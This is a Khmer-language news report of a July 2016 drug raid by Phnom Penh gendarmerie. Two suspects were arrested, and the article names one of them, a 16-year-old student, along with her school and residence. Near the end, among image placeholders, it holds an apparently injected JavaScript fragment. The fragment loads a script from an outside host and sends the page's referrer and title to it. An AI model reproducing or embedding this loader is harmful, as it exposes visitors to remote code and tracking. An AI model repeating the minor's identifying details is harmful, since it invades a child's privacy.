កម្លាំងកងរាជអាវុធហត្ថរាជធានីភ្នំពេញ  ឆ្មក់បង្ក្រាបក្រុមជួញដូរគ្រឿងញៀន ឃាត់ខ្លួនបានមនុស្សចំនួន២នាក់

ភ្នំពេញ៖នៅថ្ងៃទី២៦ ខែកក្កដា ឆ្នាំ២០១៦ នៅវេលាម៉ោង៤:៣០នាទីនៅចំណុច Apartmentលេខ៣៧ ហ្សេត ផ្លូវ២៦១ហ្សេត ភូមិ៣ សង្កាត់បឹងសាឡាងខណ្ឌទួលគោក រាជធានីភ្នំពេញ កម្លាំងកងរាជអាវុធហត្ថរាជធានីភ្នំពេញ សហការជាមួយកម្លាំងកងរាជអាវុធហត្ថខណ្ឌទួលគោកបាន ចុះបង្ក្រាបក្រុមជួញដូរគ្រឿងញៀន ឃាត់ខ្លួនបានមនុស្សចំនួន២នាក់ អាវុធខ្លីចំនួន២ដើម និងគ្រឿងញៀនមួយចំនួនធំ។

ប្រតិបត្តិការនេះដឹកនាំដោយលោក ប៉ាន់ សុភាព នាយការិយាល័យប្រឆាំងបទល្មើសគ្រឿងញៀន នៃកងរាជអាវុធហត្ថរាជធានីភ្នំពេញ ដែលមានការសម្របសម្រួលដោយលោក សៀង សុខ ព្រះរាជអាជ្ញារងអយ្យការអមសាលាដំបូងរាជធានីភ្នំពេញ ដោយធ្វើការឃាត់ខ្លួនជាក់ស្តែងនៅ Apartment ខាងលើ បន្ទប់ជាន់ទី១។

លោក ប៉ាន់ សុភាព បានប្រាប់ថាមុនឈានដល់ការចុះឆែកឆេរនិងឃាត់ខ្លួនរួមទាំងវត្ថុតាងខាងលើ គឺកម្លាំងកងរាជអាវុធហត្ថខណ្ឌមានជ័យបានធ្វើការឃាត់ខ្លួនបក្ខពួកម្នាក់ការពីថ្ងៃទី២៥ ខែកក្កដា ឆ្នាំ២០១៦ នៅវេលាម៉ោង៩ទៅ១០យប់ ហើយនាំយកសាកសួរអស់រយះពេលជិត២០ម៉ោង ទើបជនសង្ស័យព្រមឆ្លើយសារភាព ហើយកម្លាំងជំនាញស្នើរសុំបទបញ្ជាមេបញ្ជាការកងរាជអាវុធហត្ថរាជធានីភ្នំពេញ ចុះមកឆែកឆេរឃើញជាក់ស្តែងតែម្តង។

កម្លាំងជំនាញបានអោយដឹងថា ជនសង្ស័យឈ្មោះ ចាន់ វិចិត្រ ភេទប្រុស អាយុ ៣២ឆ្នាំ ជនជាតិខ្មែរ មុខរបរ DJ នៅលីកាសុី មានស្រុកកំណើតភូមិកន្តៀង ឃុំកន្តៀង ស្រុកកន្តៀងក្នុង ខេត្តពោធ៏សាត់ និង នារីសង្ស័យឈ្មោះ សំ សូនីតា ភេទស្រី ជនជាតិខ្មែរ អាយុ ១៦ឆ្នាំ មុខរបរសិស្ស ថ្នាក់ទី១០ នៃអនុវិទ្តាល័យសន្ធរម៉ុក ស្នាក់នៅក្នុងបូរីលឹមឈៀងហ៊ាក់ ខណ្ឌដង្កោ រាជធានីភ្នំពេញ។ ហើយដកហូតបានរថយន្ត Lexus GS300 ពណ៌ស ស្លាកលេខភ្នំពេញ 2AC-5515, អាវុធខ្លីចំនួន ២ដើម, គ្រឿងមួយចំនួនធំ និងឧបករណ៍សម្រាប់សេពមួយចំនួន។

បច្ចុប្បន្នជនសង្ស័យទាំង២នាក់រួមទាំងវត្ថុតាងត្រូវបានកម្លាំងឃុំខ្លួនបណ្តោះអាសន្ន នៅបញ្ជាការដ្ឋានកងរាជអាវុធហត្ថរាជធានីភ្នំពេញ ដើម្បីកសាងសំំណុំរឿងចាត់ការតាមនីតិវិធី៕

image-635 image-636e2871441-f638-4af6-a1d9-ded185df3fbf

image-379s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More